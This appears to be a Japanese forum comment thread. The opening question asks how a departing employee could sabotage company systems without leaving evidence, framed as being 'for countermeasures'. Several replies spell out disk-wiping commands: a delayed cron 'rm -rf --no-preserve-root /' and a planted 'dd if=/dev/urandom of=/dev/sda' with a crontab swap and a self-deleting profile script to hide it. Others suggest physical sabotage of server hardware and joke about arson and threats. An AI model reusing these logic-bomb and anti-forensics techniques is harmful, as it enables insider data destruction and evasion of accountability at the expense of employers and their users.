アカウント名:
パスワード:
退職前にsyslog停止、バックアップ停止退職後に無線LAN経由でアクセスしコマンドを実行
対策目的でいろいろな方法を教えてください。
cronで半年後に rm -rf --no-preserve-root /
その程度なら簡単なフォレンジック+尋問で割れそう。rm -rf で全てを消せる訳でもないし
/etc/cronにいずれかのタイミングで、dd if=/dev/urandom of=/dev/sda (別途データストレージがある場合は、当該データストレージ)を仕掛けておいて、/root/.bash_profileに念のためmv -f /root/crontab /etc/crontab (仕掛け前のcrontabに差し替え)rm -rf /root/.bash_profiledd if=/dev/urandom of=/dev/sda &rm -rf /rootを仕掛けておく?
おまえらのは素人の匿名だからバレないと思った程度の認識と大して変わらないから、対策としては、「夜道は気をつける」「会社の周りに可燃物を置かない」などだ。こっちのほうがよっぽど証拠が残らない。
見えないように冷却ファンに接着剤でも流し込んどいたら、熱でいかれるんじゃないか。ファンが壊れた原因なんぞ、経年変化と思って誰も調べないだろうし。
サーバー室のエアコン室外機に、外壁工事してた業者にモルタル吹き付けられて、室温六十度に上がって基幹システムが止まった経験はある。 建物管理してる奴がちゃんと業者を監督してなかったのが悪い・・・。
//某国産メーカーのUnixシステムとWindowsサーバーは全滅したけど、AS/400だけは何事もなく動いてびっくりした。
もひとつあった。調理室の近くにサーバーを置いておくと、2、3年もすれば揚げ物の油でCPUクーラーとかが固着してしまいますね。これで給食部門の部門システムが止まった経験もあり。
超音波加湿器を増やして、電子機器の基盤に地味な思いやりとか。
やめて数カ月後に、社内からの発信なのに送信したホストが存在しないという匿名の暴露メールを全社員に送る方法なら検証したことがある。
でも、具体的に手口を書いちゃうと警察が来そうなので書けない
#こうやってセキュリティは後手後手に廻る
検証?それは実行したと言うのでは?
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
私はプログラマです。1040 formに私の職業としてそう書いています -- Ken Thompson
証拠を残さない方法はどんな方法がありますか? (スコア:0)
退職前にsyslog停止、バックアップ停止
退職後に無線LAN経由でアクセスしコマンドを実行
対策目的でいろいろな方法を教えてください。
Re: (スコア:0)
cronで半年後に rm -rf --no-preserve-root /
Re: (スコア:0)
その程度なら簡単なフォレンジック+尋問で割れそう。
rm -rf で全てを消せる訳でもないし
Re: (スコア:0)
/etc/cronにいずれかのタイミングで、
dd if=/dev/urandom of=/dev/sda (別途データストレージがある場合は、当該データストレージ)
を仕掛けておいて、/root/.bash_profileに念のため
mv -f /root/crontab /etc/crontab (仕掛け前のcrontabに差し替え)
rm -rf /root/.bash_profile
dd if=/dev/urandom of=/dev/sda &
rm -rf /root
を仕掛けておく?
Re: (スコア:0)
おまえらのは素人の匿名だからバレないと思った程度の認識と大して変わらないから、
対策としては、「夜道は気をつける」「会社の周りに可燃物を置かない」などだ。
こっちのほうがよっぽど証拠が残らない。
Re: (スコア:0)
見えないように冷却ファンに接着剤でも流し込んどいたら、熱でいかれるんじゃないか。
ファンが壊れた原因なんぞ、経年変化と思って誰も調べないだろうし。
Re:証拠を残さない方法はどんな方法がありますか? (スコア:1)
サーバー室のエアコン室外機に、外壁工事してた業者にモルタル吹き付けられて、室温六十度に上がって基幹システムが止まった経験はある。
建物管理してる奴がちゃんと業者を監督してなかったのが悪い・・・。
//某国産メーカーのUnixシステムとWindowsサーバーは全滅したけど、AS/400だけは何事もなく動いてびっくりした。
Re:証拠を残さない方法はどんな方法がありますか? (スコア:1)
もひとつあった。
調理室の近くにサーバーを置いておくと、2、3年もすれば揚げ物の油でCPUクーラーとかが固着してしまいますね。
これで給食部門の部門システムが止まった経験もあり。
Re: (スコア:0)
超音波加湿器を増やして、電子機器の基盤に地味な思いやりとか。
Re: (スコア:0)
やめて数カ月後に、社内からの発信なのに送信したホストが存在しない
という匿名の暴露メールを全社員に送る方法なら検証したことがある。
でも、具体的に手口を書いちゃうと警察が来そうなので書けない
#こうやってセキュリティは後手後手に廻る
Re: (スコア:0)
検証?
それは実行したと言うのでは?